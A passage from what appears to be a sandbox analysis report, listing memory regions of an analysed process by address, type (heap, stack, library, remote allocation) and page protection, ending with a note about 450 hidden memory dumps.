page read and write
|
||
|
841000
|
heap
|
page read and write
|
||
|
33D1000
|
heap
|
page read and write
|
||
|
8B6000
|
heap
|
page read and write
|
||
|
8CC000
|
heap
|
page read and write
|
||
|
A614000
|
trusted library allocation
|
page read and write
|
||
|
8DF000
|
heap
|
page read and write
|
||
|
8DF000
|
heap
|
page read and write
|
||
|
9C22000
|
heap
|
page read and write
|
||
|
8DC000
|
heap
|
page read and write
|
||
|
5BA2000
|
heap
|
page read and write
|
||
|
A492000
|
heap
|
page read and write
|
||
|
33EB000
|
heap
|
page read and write
|
||
|
340F000
|
heap
|
page read and write
|
||
|
A100000
|
heap
|
page read and write
|
||
|
3DBA4FF000
|
stack
|
page read and write
|
||
|
F37867F000
|
stack
|
page read and write
|
||
|
8D3000
|
heap
|
page read and write
|
||
|
5D8F000
|
stack
|
page read and write
|
||
|
36DE000
|
stack
|
page read and write
|
||
|
5BEA000
|
heap
|
page read and write
|
||
|
2B053A50000
|
heap
|
page read and write
|
||
|
3DBA8FB000
|
stack
|
page read and write
|
||
|
3DBA67E000
|
stack
|
page read and write
|
||
|
88A000
|
heap
|
page read and write
|
||
|
341E000
|
heap
|
page read and write
|
||
|
2AC3C6B0000
|
remote allocation
|
page read and write
|
||
|
AD80000
|
heap
|
page read and write
|
||
|
340F000
|
heap
|
page read and write
|
||
|
1B9DE875000
|
heap
|
page read and write
|
||
|
670B000
|
heap
|
page read and write
|
||
|
810000
|
heap
|
page read and write
|
||
|
1B9DE936000
|
heap
|
page read and write
|
||
|
F3787F8000
|
stack
|
page read and write
|
||
|
2AC3AA95000
|
heap
|
page read and write
|
||
|
852000
|
heap
|
page read and write
|
||
|
341B000
|
heap
|
page read and write
|
||
|
343E000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
255B7810000
|
heap
|
page read and write
|
||
|
5BA1000
|
heap
|
page read and write
|
||
|
58EE000
|
stack
|
page read and write
|
||
|
33F2000
|
heap
|
page read and write
|
||
|
9EF0000
|
trusted library allocation
|
page read and write
|
||
|
5BC6000
|
heap
|
page read and write
|
||
|
1B9DE938000
|
heap
|
page read and write
|
||
|
9C35000
|
heap
|
page read and write
|
||
|
2AC3A833000
|
heap
|
page read and write
|
||
|
8CC000
|
heap
|
page read and write
|
||
|
3DBA7FF000
|
stack
|
page read and write
|
||
|
2AC3A780000
|
heap
|
page read and write
|
||
|
33F8000
|
heap
|
page read and write
|
||
|
5BDD000
|
heap
|
page read and write
|
||
|
3436000
|
heap
|
page read and write
|
||
|
89D000
|
heap
|
page read and write
|
||
|
66F6000
|
heap
|
page read and write
|
||
|
3EA000
|
stack
|
page read and write
|
||
|
6710000
|
heap
|
page read and write
|
||
|
3DBA5FD000
|
stack
|
page read and write
|
||
|
341B000
|
heap
|
page read and write
|
||
|
16103365000
|
heap
|
page read and write
|
||
|
255B7970000
|
heap
|
page read and write
|
||
|
670C000
|
heap
|
page read and write
|
||
|
66D2000
|
heap
|
page read and write
|
||
|
47A6000
|
heap
|
page read and write
|
||
|
33A5000
|
heap
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
850000
|
heap
|
page read and write
|
||
|
38C151E000
|
stack
|
page read and write
|
||
|
5BE3000
|
heap
|
page read and write
|
||
|
35D0000
|
heap
|
page read and write
|
||
|
33FB000
|
heap
|
page read and write
|
||
|
59EF000
|
stack
|
page read and write
|
||
|
340F000
|
heap
|
page read and write
|
||
|
3415000
|
heap
|
page read and write
|
||
|
A480000
|
heap
|
page read and write
|
||
|
341C000
|
heap
|
page read and write
|
||
|
8C0000
|
heap
|
page read and write
|
||
|
33D7000
|
heap
|
page read and write
|
||
|
85E000
|
heap
|
page read and write
|
||
|
255B78F0000
|
heap
|
page read and write
|
||
|
38C159F000
|
stack
|
page read and write
|
||
|
8DF000
|
heap
|
page read and write
|
||
|
1B9DE870000
|
heap
|
page read and write
|
||
|
6715000
|
heap
|
page read and write
|
||
|
55B4000
|
heap
|
page read and write
|
||
|
A4A0000
|
heap
|
page read and write
|
||
|
896000
|
heap
|
page read and write
|
||
|
3190000
|
heap
|
page read and write
|
||
|
8C0000
|
heap
|
page read and write
|
||
|
9C44000
|
heap
|
page read and write
|
||
|
3444000
|
heap
|
page read and write
|
||
|
6721000
|
heap
|
page read and write
|
||
|
2BBE000
|
stack
|
page read and write
|
||
|
7FF8BFAB9000
|
unkown
|
page read and write
|
||
|
A4AA000
|
heap
|
page read and write
|
||
|
9C37000
|
heap
|
page read and write
|
||
|
660000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
33A1000
|
heap
|
page read and write
|
||
|
8DB000
|
heap
|
page read and write
|
||
|
B3596FF000
|
stack
|
page read and write
|
||
|
1B9DEA50000
|
heap
|
page read and write
|
||
|
3DBA878000
|
stack
|
page read and write
|
||
|
8A5000
|
heap
|
page read and write
|
||
|
A0F0000
|
heap
|
page read and write
|
||
|
9C44000
|
heap
|
page read and write
|
||
|
5BE3000
|
heap
|
page read and write
|
||
|
84F000
|
heap
|
page read and write
|
||
|
7FF8BFAB1000
|
unkown
|
page execute read
|
||
|
A85B000
|
stack
|
page read and write
|
||
|
2AC3A7CE000
|
heap
|
page read and write
|
||
|
35DA000
|
heap
|
page read and write
|
||
|
33D4000
|
heap
|
page read and write
|
||
|
5BE6000
|
heap
|
page read and write
|
||
|
F37847E000
|
stack
|
page read and write
|
||
|
340B000
|
heap
|
page read and write
|
||
|
33F8000
|
heap
|
page read and write
|
||
|
9C37000
|
heap
|
page read and write
|
||
|
33F8000
|
heap
|
page read and write
|
||
|
8CC000
|
heap
|
page read and write
|
||
|
1B9DE957000
|
heap
|
page read and write
|
||
|
8A5000
|
heap
|
page read and write
|
||
|
6715000
|
heap
|
page read and write
|
||
|
B829A7F000
|
stack
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
F378166000
|
stack
|
page read and write
|
||
|
16103360000
|
heap
|
page read and write
|
||
|
910000
|
trusted library allocation
|
page read and write
|
||
|
343C000
|
heap
|
page read and write
|
||
|
66D0000
|
heap
|
page read and write
|
||
|
5B4E000
|
stack
|
page read and write
|
||
|
7FF8BFAB0000
|
unkown
|
page readonly
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
4B94000
|
heap
|
page read and write
|
There are 450 hidden memdumps, click here to show them.